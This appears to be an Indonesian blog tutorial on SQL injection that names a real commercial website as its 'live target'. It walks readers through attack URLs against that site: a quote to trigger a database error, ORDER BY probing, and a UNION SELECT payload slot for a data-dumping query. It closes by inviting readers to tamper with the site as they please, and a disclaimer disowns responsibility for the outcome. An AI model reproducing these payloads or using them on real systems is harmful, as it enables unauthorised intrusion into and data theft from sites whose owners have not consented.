Labels

SQLinjection

Tutorial SQLinjection - Sesuai dengan judul diatas, saya AkbarAvila akan menemani tutorial SQLinjection,
disini kalian tidak usah dorking dulu melalui browser, karena disini kita belajar jadi live target dari saya. Langsung saja masuk ke tutorialnya.

===================
Author: AkbarAvila
Instagram: that1akbar
telegram: t.me/smelxD
====================
Live target: http://ac-aesthetics.com/store/product.php?id=9

Mas terus bagaimana caranya kita tau kalau web itu vuln dengan SQL?
ya coba kalian tambahkan string ' di akhir url maka akan muncul seperti You have an error in your SQL syntax; check the manual that corresponds to your MySQL bla bla bla

Jika kalian menemukan teks seperti itu pada saat kalian menambahkan string ' pada akhir url itu artinya web tersebut vuln terhadap serangan SQL. Selanjutnya kita akan memainkan order by, order by ini kita lakukan untuk mengetahui berapa column yang ada pada website tersebut, mari kita lakukan!

http://ac-aesthetics.com/store/product.php?id=-9 order by 1-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 2-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 3-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 4-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 5-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 6-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 7-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 8-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 9-- 
http://ac-aesthetics.com/store/product.php?id=-9 order by 10-- error
        
kira-kira begitu cara kita mengecek sebuah column atau table atau juga halaman website. Intinya jika kita mengorder by 1 misalnya masih normal, boleh kita ubah angka 1 itu entah menjadi 10 atau berapa, sampai web itu error. Langkah berikutnya kita akan melakukan union select. Cara ini lebih simpel ya dari cara order by tadi, cuma cara union select ini kita hanya perlu menjadikan satu angka yg masih normal, contoh : http://ac-aesthetics.com/store/product.php?id=-9 union select 1,2,3,4,5,6,7,8,9--

cara union select ini dilakukan supaya kita bisa tau mana angka yang terbilang istimewa itu muncul, tadikan saya sudah melakukan union select. Di website tersebut yang muncul adalah angka 3, di angka 3 ini kita bisa menaruh sebuah dios kita yaa recode juga bolehsi hehe.

oke sebagai contoh:

http://ac-aesthetics.com/store/product.php?id=-9 union select 1,2,(kalian isi dios kalian yaa disini dan jangan lupa untuk hapus tanda kurung ini),4,5,6,7,8,9--

dan BOOM!! kalian bisa mengutak-atik web tersebut terserah kalian.
note: Jangan salahkan admin bila terjadi apa-apa, tutorial ini dibuat hanya untuk membagi ilmu

Labels:

Comments

Post a Comment

Thanks you for support